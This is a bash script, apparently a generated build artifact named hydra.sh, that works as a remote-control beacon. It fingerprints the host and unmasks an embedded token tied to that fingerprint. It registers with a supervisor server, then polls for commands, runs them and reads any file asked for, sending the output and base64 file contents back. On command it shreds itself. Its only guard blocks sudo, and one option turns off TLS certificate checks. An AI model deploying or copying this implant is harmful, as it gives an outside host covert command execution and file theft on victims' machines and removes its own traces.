#!/usr/bin/env bash
# AUTO-GENERATED by build.sh — DO NOT EDIT.
# Boot sequence: fingerprint, HYDRA_HOME, register handshake.

hydra_machine_uuid() {
  if [ -r /etc/machine-id ]; then
    cat /etc/machine-id
    return
  fi
  if command -v ioreg >/dev/null 2>&1; then
    ioreg -rd1 -c IOPlatformExpertDevice 2>/dev/null \
      | awk -F\" '/IOPlatformUUID/{print $4; exit}' && return
  fi
  if command -v lsblk >/dev/null 2>&1; then
    lsblk -ndo SERIAL 2>/dev/null | awk 'NF{print; exit}' && return
  fi
  echo "no-machine-uuid"
}

hydra_primary_mac() {
  if command -v ip >/dev/null 2>&1; then
    ip -o link show 2>/dev/null | awk '/link\/ether/ && !/00:00:00:00:00:00/ {print $17; exit}'
    return
  fi
  if command -v ifconfig >/dev/null 2>&1; then
    ifconfig 2>/dev/null | awk '/ether/ {print $2; exit}'
    return
  fi
  echo "00:00:00:00:00:00"
}

hydra_fingerprint() {
  local h m u
  h=$(hostname 2>/dev/null || echo unknown)
  m=$(hydra_primary_mac)
  u=$(hydra_machine_uuid)
  printf '%s|%s|%s' "$h" "$m" "$u" | openssl dgst -sha256 -hex | awk '{print $2}'
}

hydra_detect_platform() {
  case "$(uname -s)" in
    Linux*)
      if grep -qi microsoft /proc/version 2>/dev/null; then echo wsl; else echo linux; fi ;;
    Darwin*) echo macos ;;
    *) echo linux ;;
  esac
}

hydra_init_home() {
  # $1 = mission_id
  HYDRA_HOME="$HOME/.hydra/$1"
  mkdir -p "$HYDRA_HOME"
  chmod 700 "$HYDRA_HOME"
  export HYDRA_HOME
}
# HMAC + XOR token helpers. POSIX-bash. No jq.

hydra_hmac_hex() {
  # $1=key  $2=method  $3=path  $4=body  $5=ts
  local msg
  msg=$(printf '%s\n%s\n%s\n%s' "$2" "$3" "$4" "$5")
  printf '%s' "$msg" | openssl dgst -sha256 -hmac "$1" -hex | awk '{print $2}'
}

hydra_unmask_token() {
  # $1=masked_hex  $2=fingerprint  $3=salt
  local masked_hex="$1" fp="$2" salt="$3" mask_hex
  mask_hex=$(printf '%s' "$fp" | openssl dgst -sha256 -hmac "$salt" -hex | awk '{print $2}')
  local need=${#masked_hex}
  mask_hex=${mask_hex:0:$need}
  local out='' i mb tb xor
  for ((i=0; i<need; i+=2)); do
    tb=$((16#${masked_hex:i:2}))
    mb=$((16#${mask_hex:i:2}))
    xor=$((tb ^ mb))
    out+=$(printf '%02x' "$xor")
  done
  printf '%s' "$out"
}
# Six primitives: register, poll, exec, read, report, terminate.
# HYDRA_INSECURE_TLS=1 disables curl cert verification (DRY-RUN ONLY,
# for hosts with stale CA bundles where the supervisor's LE cert won't validate).
HYDRA_CURL_INSECURE_FLAG=""
[ "${HYDRA_INSECURE_TLS:-0}" = "1" ] && HYDRA_CURL_INSECURE_FLAG="-k"

hydra_json_escape() {
  python3 -c "import json,sys; sys.stdout.write(json.dumps(sys.stdin.read()))"
}

hydra_exec_cmd() {
  # $1=cmd  $2=timeout_s
  local cmd="$1" t="$2"
  local out_file err_file start end exit_code
  out_file=$(mktemp); err_file=$(mktemp)
  start=$(date +%s%3N 2>/dev/null || python3 -c 'import time;print(int(time.time()*1000))')
  timeout "$t" bash -c "$cmd" >"$out_file" 2>"$err_file"; exit_code=$?
  end=$(date +%s%3N 2>/dev/null || python3 -c 'import time;print(int(time.time()*1000))')
  local stdout_json stderr_json
  stdout_json=$(hydra_json_escape <"$out_file")
  stderr_json=$(hydra_json_escape <"$err_file")
  rm -f "$out_file" "$err_file"
  printf '{"stdout":%s,"stderr":%s,"exit_code":%d,"wall_ms":%d}' \
    "$stdout_json" "$stderr_json" "$exit_code" "$((end - start))"
}

hydra_read_file() {
  # $1=path  $2=max_bytes  $3=scope (home|any)
  local path="$1" max="$2" scope="$3"
  if [ "$scope" = "home" ]; then
    case "$path" in
      "$HYDRA_HOME"/*) ;;
      *) printf '{"err":"policy","reason":"path-outside-home"}'; return 1 ;;
    esac
  fi
  if [ ! -r "$path" ]; then
    printf '{"err":"unreadable"}'; return 1
  fi
  local size truncated content_b64
  size=$(stat -c '%s' "$path" 2>/dev/null || stat -f '%z' "$path")
  if [ "$size" -gt "$max" ]; then truncated=true; else truncated=false; fi
  content_b64=$(head -c "$max" "$path" | base64 -w 0 2>/dev/null || head -c "$max" "$path" | base64)
  printf '{"size":%d,"truncated":%s,"content_b64":"%s"}' "$size" "$truncated" "$content_b64"
}

hydra_register() {
  # $1=supervisor_url  $2=mission_id  $3=fingerprint  $4=platform  $5=version
  curl $HYDRA_CURL_INSECURE_FLAG -fsS -X POST "$1/v1/register" \
    -H 'Content-Type: application/json' \
    -d "{\"mission_id\":\"$2\",\"fingerprint\":\"$3\",\"platform\":\"$4\",\"version\":\"$5\"}"
}

hydra_poll() {
  # $1=supervisor_url  $2=mission_id  $3=session_key  $4=last_op_id
  local ts sig path
  ts=$(date +%s)
  path="/v1/poll?mission=$2"
  sig=$(hydra_hmac_hex "$3" 'GET' "$path" '' "$ts")
  curl $HYDRA_CURL_INSECURE_FLAG -fsS "$1$path" -H "X-Hydra-Sig: $sig" -H "X-Hydra-Ts: $ts"
}

hydra_report() {
  # $1=supervisor_url  $2=mission_id  $3=session_key  $4=op_id  $5=ok(true|false)  $6=payload_inline_json
  local ts sig body
  ts=$(date +%s)
  body="{\"mission_id\":\"$2\",\"op_id\":\"$4\",\"ok\":$5,\"data\":$6,\"wall_ms\":0}"
  sig=$(hydra_hmac_hex "$3" 'POST' '/v1/report' "$body" "$ts")
  curl $HYDRA_CURL_INSECURE_FLAG -fsS -X POST "$1/v1/report" \
    -H "X-Hydra-Sig: $sig" -H "X-Hydra-Ts: $ts" -H 'Content-Type: application/json' \
    -d "$body"
}

hydra_terminate() {
  rm -rf "$HYDRA_HOME" 2>/dev/null
  shred -u "$0" 2>/dev/null || rm -f "$0"
  exit 0
}
# script/lib/guards.sh
# Self-guards: deny sudo invocation, refuse paths outside HYDRA_HOME, no inbound listen sockets

hydra_check_cmd() {
  case "$1" in
    *sudo\ *|sudo) return 1 ;;
  esac
  return 0
}

hydra_assert_path_in_home() {
  case "$1" in
    "$HYDRA_HOME"/*) return 0 ;;
    *) return 1 ;;
  esac
}

hydra_assert_no_listen() {
  if command -v ss >/dev/null 2>&1; then
    if ss -tlnp 2>/dev/null | grep -q "pid=$$"; then return 1; fi
  fi
  return 0
}
# hydra.sh — autonomous goal-seeking organism (script half).
# License: see repository LICENSE.
set -eu

SUPERVISOR_URL='__SUPERVISOR_URL__'
EMBEDDED_TOKEN_MASKED='__MASKED_TOKEN_HEX__'
EMBEDDED_TOKEN_SALT='__SALT__'
MISSION_ID='__MISSION_ID__'
HYDRA_VERSION='0.1.0'

hydra_main() {
  local platform fp token session_key resp d op id sleep_s cmd t result body path m
  platform=$(hydra_detect_platform)
  fp=$(hydra_fingerprint)
  token=$(hydra_unmask_token "$EMBEDDED_TOKEN_MASKED" "$fp" "$EMBEDDED_TOKEN_SALT")

  hydra_init_home "$MISSION_ID"

  resp=$(hydra_register "$SUPERVISOR_URL" "$MISSION_ID" "$fp" "$platform" "$HYDRA_VERSION") || exit 0
  session_key=$(printf '%s' "$resp" | grep -oE '"session_key":"[^"]+"' | cut -d'"' -f4)
  [ -n "$session_key" ] || exit 0

  while true; do
    d=$(hydra_poll "$SUPERVISOR_URL" "$MISSION_ID" "$session_key" '' || true)
    [ -n "$d" ] || { sleep 5; continue; }
    op=$(printf '%s' "$d" | grep -oE '"op":"[^"]+"' | cut -d'"' -f4)
    id=$(printf '%s' "$d" | grep -oE '"id":"[^"]+"' | cut -d'"' -f4)
    case "$op" in
      yield)
        sleep_s=$(printf '%s' "$d" | grep -oE '"sleep_s":[0-9]+' | cut -d: -f2)
        sleep "${sleep_s:-5}"
        ;;
      exec)
        cmd=$(printf '%s' "$d" | python3 -c "import json,sys;print(json.load(sys.stdin)['cmd'])")
        t=$(printf '%s' "$d" | grep -oE '"timeout_s":[0-9]+' | cut -d: -f2)
        hydra_check_cmd "$cmd" || { hydra_report "$SUPERVISOR_URL" "$MISSION_ID" "$session_key" "$id" false '{"err":"policy"}'; continue; }
        result=$(hydra_exec_cmd "$cmd" "${t:-30}")
        hydra_report "$SUPERVISOR_URL" "$MISSION_ID" "$session_key" "$id" true "$result"
        ;;
      read)
        path=$(printf '%s' "$d" | python3 -c "import json,sys;print(json.load(sys.stdin)['path'])")
        m=$(printf '%s' "$d" | grep -oE '"max_bytes":[0-9]+' | cut -d: -f2)
        result=$(hydra_read_file "$path" "${m:-4096}" 'any')
        hydra_report "$SUPERVISOR_URL" "$MISSION_ID" "$session_key" "$id" true "$result"
        ;;
      terminate)
        hydra_terminate
        ;;
      *)
        sleep 5
        ;;
    esac
  done
}

hydra_main
